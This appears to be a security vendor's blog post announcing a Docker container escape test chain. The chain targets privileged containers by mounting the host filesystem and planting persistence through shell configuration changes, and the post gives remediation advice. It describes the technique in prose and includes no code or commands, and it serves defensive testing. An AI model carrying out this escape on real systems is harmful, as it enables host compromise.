Is my Docker container vulnerable to host filesystem mounting?

Containers that can mount the host filesystem may be vulnerable to a container escape. This chain attempts to mount the host filesystem, identify a root directory, and establish persistence. It is important that containers cannot mount the host filesystem, as adversaries may establish persistence by modifying mounted files, elevate privileges, and escape the container.
This week, we are releasing a Docker container escape TTP:
  • Is my Docker container vulnerable to host filesystem mounting?

Is my Docker container vulnerable to host filesystem mounting?

For this week's TTP Tuesday, we're providing a Docker container escape. This TTP demonstrates how to escape from a Docker container that can mount the host filesystem. Containers that are running in privileged mode share a namespace with the host system, so the root user within the container is effectively also root on the host system. If a container is running in privileged mode, an attacker may read, write, and execute files on the host system.

The issue affects any Docker container running with the --privileged flag. Note that this is not a vulnerability in Docker code, but rather a common security misconfiguration of the Docker container.

Testing

Execute Operator's Is my Docker container vulnerable to host filesystem mounting? TTP on each Docker container in your environment to test if you are vulnerable.

The TTP checks if the agent is running within a privileged Docker container. Next, it checks if the host filesystem can be mounted. Finally, it will attempt to establish persistence on the host via Unix shell configuration modification.

Remediation

The recommended remediation is to not run Docker containers in privileged mode.

Check out the TTP Is my Docker container vulnerable to host filesystem mounting? on the Prelude chains website.

Staying up to date

Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!

There are several ways to follow us and learn more about Prelude and our team members:

Get our products

Download Prelude Operator: https://www.prelude.org/download/current

See the latest kill chain and TTP Releases: https://chains.prelude.org

See our open-source repositories: https://github.com/preludeorg

Join our community

Discord: https://discord.gg/gzUv4XNquu

Reddit: https://www.reddit.com/r/preludeorg/

Twitter: https://twitter.com/preludeorg

Read, watch, and listen

Listen to our Podcast: https://anchor.fm/preludeorg

Read our blog: https://feed.prelude.org

Watch our live streams: https://www.twitch.tv/preludeorg

Watch our pre-recorded content: https://www.youtube.com/c/preludeorg

Follow our team

David: https://twitter.com/privateducky

Alex: https://twitter.com/khyberspache

Octavia: https://twitter.com/VVX7

Waseem: https://twitter.com/gerbsec

Source: https://feed.prelude.org
Read more

Execute this chain

Download Operator (1.7.1)
Learn about Operator

TTPs

Is this Docker container running in privileged mode?
Is my Docker container vulnerable to host filesystem mounting?
Persistence via mounted Unix shell configuration modification